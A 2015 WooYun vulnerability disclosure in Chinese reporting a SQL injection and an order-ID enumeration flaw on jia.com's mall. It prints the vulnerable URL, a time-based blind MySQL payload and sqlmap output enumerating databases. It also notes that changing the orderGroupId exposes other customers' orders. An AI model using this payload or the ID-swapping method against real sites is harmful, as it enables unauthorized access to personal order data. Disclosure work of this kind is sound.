当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111773

漏洞标题:齐家网某处SQL注入漏洞 #数万条订单数据泄露

相关厂商:jia.com

漏洞作者: 0x 80

提交时间:2015-05-03 20:40

修复时间:2015-05-08 20:42

公开时间:2015-05-08 20:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-03: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

齐家网某处SQL注入漏洞 #数万条订单数据泄露 #5.1节日快乐

详细说明:

注入
http://mall.jia.com/gys/get_ab_order?orderGroupId=3461444

Place: GET
Parameter: orderGroupId
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: orderGroupId=3461349' AND SLEEP(5) AND 'SZZb'='SZZb
---
[11:43:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[11:43:49] [INFO] fetching database names
[11:43:49] [INFO] fetching number of databases
[11:43:49] [WARNING] time-based comparison needs larger statistical model.
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (o
'--time-sec')? [Y/n] y
[11:44:30] [WARNING] it is very important not to stress the network adapte
ndwidth during usage of time-based payloads
5
[11:44:37] [INFO] retrieved:
[11:44:43] [INFO] adjusting time delay to 1 second due to good response ti
in
[11:45:05] [ERROR] invalid character detected. retrying..
[11:45:05] [WARNING] increasing time delay to 2 seconds
fo
[11:45:47] [ERROR] invalid character detected. retrying..
[11:45:47] [WARNING] increasing time delay to 3 seconds
rmat
[11:47:04] [ERROR] invalid character detected. retrying..
[11:47:04] [WARNING] increasing time delay to 4 seconds
ion_schem
[11:50:23] [ERROR] invalid character detected. retrying..
[11:50:23] [WARNING] increasing time delay to 5 seconds
[11:50:42] [ERROR] invalid character detected. retrying..
[11:50:42] [WARNING] increasing time delay to 6 seconds
a
[11:51:15] [ERROR] unable to properly validate last character value ('  ')
[11:51:18] [INFO] retrieved: N
[11:51:37] [ERROR] invalid character detected. retrying..
[11:51:37] [WARNING] increasing time delay to 2 seconds
EW
[11:52:10] [ERROR] invalid character detected. retrying..
[11:52:10] [WARNING] increasing time delay to 3 seconds
MALL
[11:53:03] [INFO] retrieved: cm
[11:53:53] [ERROR] invalid character detected. retrying..
[11:53:53] [WARNING] increasing time delay to 4 seconds
s
[11:54:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap
ing to retry the request
[11:54:42] [ERROR] invalid character detected. retrying..
[11:54:42] [WARNING] increasing time delay to 5 seconds
[11:54:53] [ERROR] invalid character detected. retrying..
[11:54:53] [WARNING] increasing time delay to 6 seconds
[11:55:04] [ERROR] unable to properly validate last character value ('').
[11:55:07] [INFO] retrieved: t
[11:55:24] [ERROR] invalid character detected. retrying..
[11:55:24] [WARNING] increasing time delay to 2 seconds
est
[11:56:06] [ERROR] invalid character detected. retrying..
[11:56:06] [WARNING] increasing time delay to 3 seconds
[11:56:09] [INFO] retrieved: u
[11:56:40] [ERROR] invalid character detected. retrying..
[11:56:40] [WARNING] increasing time delay to 4 seconds
[11:56:57] [ERROR] invalid character detected. retrying..
[11:56:57] [WARNING] increasing time delay to 5 seconds


36.png


订单泄露
http://mall.jia.com/gys/get_ab_order?orderGroupId=3461444
ID处没有加密,替换即可,可以获取订单信息

378.png


http://mall.jia.com/gys/get_ab_order?orderGroupId=3461446


47.png


漏洞证明:

9.png


372.png

修复方案:

过滤

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-08 20:42

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论